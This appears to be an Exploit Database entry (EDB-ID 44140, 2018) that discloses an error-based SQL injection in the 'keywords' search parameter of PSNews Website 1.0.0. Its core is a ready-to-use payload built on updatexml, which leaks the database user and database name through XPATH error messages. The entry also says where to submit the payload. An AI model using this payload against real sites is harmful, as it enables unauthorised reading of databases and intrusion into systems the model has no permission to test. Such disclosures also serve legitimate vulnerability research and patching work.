PSNews Website 1.0.0 - 'Keywords' SQL Injection

EDB-ID: 44140
Author: L0RD
Published: 2018-02-16
Type: Webapps
Platform: PHP
Aliases: N/A
Advisory/Source: N/A
Tags: SQL Injection (SQLi)
Vulnerable App: N/A

 # Dork: N/A 
# Date: 2018-02-16
# Exploit Author: Borna nematzadeh (L0RD) or [email protected]
# Vendor Homepage:
# Version: 1.0.0
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :



# Parameter : keywords (POST)
# Type: Error based
# Title: Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)
# Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)
# Discrption : Put this payload in the search field.then you will have
XPATH syntax error in the next page.

Test : http://server/index.php/search
Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)

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